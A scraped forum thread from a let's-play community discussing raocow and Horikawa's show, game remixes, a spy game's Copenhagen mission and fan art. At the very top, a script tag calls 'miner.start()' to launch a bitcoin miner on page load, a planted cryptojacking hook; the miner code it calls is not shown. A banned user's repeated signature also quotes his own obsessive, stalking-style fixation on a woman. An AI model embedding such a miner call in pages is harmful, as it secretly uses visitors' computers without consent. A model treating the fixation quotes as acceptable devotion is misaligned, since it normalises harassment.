<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

raocow and Horikawa's Super Sexy Sunday Side Show

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Willhart » 1 year ago

I hope they make a sequel someday. Also I appreciate how some of the earlier levels were seen at the end too. It was nice to see the difference from before. I think the last puzzle was pretty well balanced too, with only 6 modules. Each half did not seem too impossible/time consuming to solve. Looking forward to more co-op in the future.
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

User avatar
Ometeotl
Posts: 630
Joined: 7 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Ometeotl » 1 year ago

Poor Pyro.
Image

User avatar
Grounder
Posts: 1880
Joined: 3 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Grounder » 1 year ago

hb horikawa
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

User avatar
TaviTurnip
I'm just here to remind people I'm here
Abministrator
Posts: 991
Joined: 7 years ago
First name: Rena, despite assumptions
Location: Up

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby TaviTurnip » 1 year ago

Clean.
I'm just here to annoy you so that you aren't here instead.

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 1 year ago

I think the other main thing where Pyro kind of worked herself into a corner besides committing to remixing levels from every tier was that she committed to doing Umbra remixes rather than just trying to work with each remix as a fresh slate. The Umbra gimmick does not really work well with everything, especially after you've already seen it several times in past worlds. You end up with stuff like "Too Many Forts", where instead of asking what the level did well and where it could be enhanced or improved, or even just how the concept could be pushed further or explored in a new way, the factor driving decisions seems to be how to shoehorn Umbra's style into it. And then you can end up with a hectic, spammy, and messy level that loses a lot of the charm of the original.

I think the problem is compounded by the fact that the later remixes are all starting with better base levels, where the Umbra-fication is more likely to detract from the original, and those all come after you've already encountered several Umbra remixes, where the idea can start to get redundant. So it really starts to stand out as a problem the deeper you get into the game.

P.S. Happy belated birthday, Horikawa

User avatar
Dragon Fogel
Master of Pointlessness
Posts: 761
Joined: 3 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Dragon Fogel » 1 year ago

I think the problem is, the Umbra levels are missing the key element that made Umbra memorable in the first place - bad fanfiction.

So instead you've got "oh man it's Umbra isn't that SO WACKY". You can get away with one level like that as cheap laughs, but not a whole series of them.
Image
Click that banner if you like reading words.
Image
Make levels from unused MAGL X names!

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Willhart » 1 year ago

Almost top ten now. Very exciting.
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

User avatar
Ometeotl
Posts: 630
Joined: 7 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Ometeotl » 1 year ago

Get hype
Image

User avatar
Ometeotl
Posts: 630
Joined: 7 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Ometeotl » 1 year ago

I told you you could do it, you big baby.
Image

User avatar
Le Neveu de Rameau
Rødgrød uden fløde
Posts: 700
Joined: 2 years ago
First name: Rameau's Nephew
Location: Rubbish bin, hands comically perched on the rim.

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Le Neveu de Rameau » 11 months ago

Oh man, the Copenhagen mission of Clam's Destiny is super for me weird to watch compared to the first one (which was also weird to watch, but only in the way that the entire game is weird to watch). I guess it's because the first part takes place in a fictional warehouse in the middle of nowhere, whereas the current one takes place in a real location in a city I used to live in, making it bizarrely personal. Especially since I spent a good amount of my free time in that city sneaking around places I wasn't supposed to be with a Russian girl named (of all things) Katja. I don't recall her ever beating any security personnel unconscious, mind, but I'd hardly have put it past her. She took no guff.

That said--you're explicitly fighting the police in the first mission as well, but they're depicted as cartoonish stereotypes who are in the pocket of drug lords--in short, they're eeeevil. Here, though, they're just regular working schmoes doing regular work, and yet the game keeps advising you "Have you considered....murder?" But in contrast to the offensive Mexican stereotypes, these seem oddly like real, ordinary Danes (feel free to contribute you own analyses of the broader implications of Latin American characters being abstracted, cartoonized and vilified whereas residents of a wealthy western European nation are instead humanized!), so the "Kill, kill, KILL!" advice the game keeps giving you seems rather excessive, especially since you're not meant to be playing a villain protagonist or anything.

It's also probably a bad idea from the whole stealth angle, as well. Not only are these non-dug-lord-assisting police officers currently on official duty in service of a legitimate government, this is Denmark, where shooting a police officer is a big deal. The last time something like that happened in Copenhagen, it caused quite a stir. My old partner in crime going on a shooting spree like the game apparently so desperately wants her too would almost certainly cause an international incident. I know this is supposed to be the raggiest, taggiest group of spies around and everything, but jeez guys, get your act together.

User avatar
Horikawa Otane
The MaGL Goddess
Posts: 1457
Joined: 5 years ago
First name: Servalan
Location: The Last of the Babylon Stations

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Horikawa Otane » 11 months ago

Le Neveu de Rameau wrote:Oh man, the Copenhagen mission of Clam's Destiny is super for me weird to watch compared to the first one (which was also weird to watch, but only in the way that the entire game is weird to watch). I guess it's because the first part takes place in a fictional warehouse in the middle of nowhere, whereas the current one takes place in a real location in a city I used to live in, making it bizarrely personal. Especially since I spent a good amount of my free time in that city sneaking around places I wasn't supposed to be with a Russian girl named (of all things) Katja. I don't recall her ever beating any security personnel unconscious, mind, but I'd hardly have put it past her. She took no guff.

That said--you're explicitly fighting the police in the first mission as well, but they're depicted as cartoonish stereotypes who are in the pocket of drug lords--in short, they're eeeevil. Here, though, they're just regular working schmoes doing regular work, and yet the game keeps advising you "Have you considered....murder?" But in contrast to the offensive Mexican stereotypes, these seem oddly like real, ordinary Danes (feel free to contribute you own analyses of the broader implications of Latin American characters being abstracted, cartoonized and vilified whereas residents of a wealthy western European nation are instead humanized!), so the "Kill, kill, KILL!" advice the game keeps giving you seems rather excessive, especially since you're not meant to be playing a villain protagonist or anything.

It's also probably a bad idea from the whole stealth angle, as well. Not only are these non-dug-lord-assisting police officers currently on official duty in service of a legitimate government, this is Denmark, where shooting a police officer is a big deal. The last time something like that happened in Copenhagen, it caused quite a stir. My old partner in crime going on a shooting spree like the game apparently so desperately wants her too would almost certainly cause an international incident. I know this is supposed to be the raggiest, taggiest group of spies around and everything, but jeez guys, get your act together.
Hey look. We're ABOVE the law. WE DO WHAT NEEDS TO BE DONE TO GET THE MISSION DONE.


...Or something. Blame that telepathic lady with the weird face. She orchestrates these things.
Image
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2533
Joined: 6 years ago
Location: Finland

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Willhart » 10 months ago

Still relevant:

Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

User avatar
Le Neveu de Rameau
Rødgrød uden fløde
Posts: 700
Joined: 2 years ago
First name: Rameau's Nephew
Location: Rubbish bin, hands comically perched on the rim.

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Le Neveu de Rameau » 10 months ago

raocow wrote:That's interesting that a nation's language would change that drastically.
You still speaking Classical Latin then, Cicero?

User avatar
Horikawa Otane
The MaGL Goddess
Posts: 1457
Joined: 5 years ago
First name: Servalan
Location: The Last of the Babylon Stations

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Horikawa Otane » 10 months ago


Image
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 10 months ago

You'd think French speakers would be among the least surprised about drastic changes in pronunciation if their spelling is any indication of how things used to be pronounced. Although English speakers who have tried to read Beowulf, or even Chaucer, would also know a thing about that (thanks, Normans).

The whole mandate of heaven thing is a huge part of western history, as well as Judeo-Christian history. In the U.S., that was a major theme of both the slave trade and the conquest of our transcontinental territory from native populations and/or Mexico under the doctrine of manifest destiny. European imperialism in the age of expansion was also justified through similar thinking, along with the Crusades, the Holy Roman Empire, etc. And going back even further, half of the Hebrew Bible/Old Testament is just a history of the Israelites winning or losing battles based on how recently they had pissed off their own god.

Sturg got considerably better at giving hints for the latest VGM-guessing contest.

User avatar
BobisOnlyBob
is Only BobisOnlyBob
Posts: 277
Joined: 4 years ago
First name: Bob (is Only Bob)
Location: COMPUTER SPACE

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby BobisOnlyBob » 10 months ago




Still my favourite, features the amazing Cave Story one leading directly into SMB2. Also exactly eight awesome minutes. And KinkyOats, a raocow remixer, contributed to this one. And Star Maze from SML2!!
BOB is an acronym for BOB is Only BOB etc.

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 10 months ago

I didn't play FFVII until a few years ago (and I actually remember being really turned off by the cover art when the game came out and having no interest in it), but I still enjoyed it quite a bit. I like the environmental and identity themes in the story, and I find Sephiroth to be a really interesting villain. His character is not really explored until later in the game, though.

The graphics of that game are kind of terrible, which is a little hard to get past. I played FFX as my first Final Fantasy, and it's remarkable how far 3D graphics advanced between those games. I think the early 3D polygon stuff looks way worse than the SNES-era 2D stuff that preceded it, and in general the visuals of the game just did not age well at all. And Barrett is kind of a terrible character, but most FFs I've played have at least one party member who I have trouble appreciating as a character, which I generally just deal with by never using them.

User avatar
HamsterZerg
True Pacifist or bust.
Posts: 239
Joined: 3 years ago
Pronouns: he/him/his
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby HamsterZerg » 9 months ago

Meanwhile, Umbra mission for raocow's level is a go.
Image
Image

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!

[ispoiler]Somebody should make an animation where the knife slash at the end of the Genocide run is Frisk killing Chara, who is shocked, then scared, and finally sad, apologizing to Asriel and asking him for forgiveness.[/ispoiler]


Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 5 months ago

Beware the Boop Zone!
Clandestine fanart Katya.jpg
Clandestine fanart Katya.jpg (119.89 KiB) Viewed 849 times
Clandestine fanart Martin.jpg
Clandestine fanart Martin.jpg (194.51 KiB) Viewed 849 times

User avatar
Horikawa Otane
The MaGL Goddess
Posts: 1457
Joined: 5 years ago
First name: Servalan
Location: The Last of the Babylon Stations

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Horikawa Otane » 5 months ago

kitikami wrote: Beware the Boop Zone!

Clandestine fanart Katya.jpg

Clandestine fanart Martin.jpg
...I-Is this Clandestine Fanart?! It's so beautiful and hilarious oh my god hahahahahaha.

If your goal was to cheer me up and make me laugh - gotta say, boy you accomplished that wow. I'm sitting here laughing like a lunatic (especially at that second picture!)
Image
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 5 months ago

Haha, I'm glad you enjoyed them

User avatar
kitikami
Posts: 304
Joined: 4 years ago

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby kitikami » 4 months ago

Screen Shot 2017-07-18 at 2.35.27 AM.png
Screen Shot 2017-07-18 at 2.35.27 AM.png (170.11 KiB) Viewed 640 times
Screen Shot 2017-07-18 at 2.35.47 AM.png
Screen Shot 2017-07-18 at 2.35.47 AM.png (228.02 KiB) Viewed 640 times

User avatar
Horikawa Otane
The MaGL Goddess
Posts: 1457
Joined: 5 years ago
First name: Servalan
Location: The Last of the Babylon Stations

Re: raocow and Horikawa's Super Sexy Sunday Side Show

Postby Horikawa Otane » 4 months ago

kitikami wrote: Screen Shot 2017-07-18 at 2.35.27 AM.pngScreen Shot 2017-07-18 at 2.35.47 AM.png
!!! Thanks! This was annoying me so much haha
Image
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!


Return to “let's play”

Who is online

Users browsing this forum: Google [Bot] and 8 guests

cron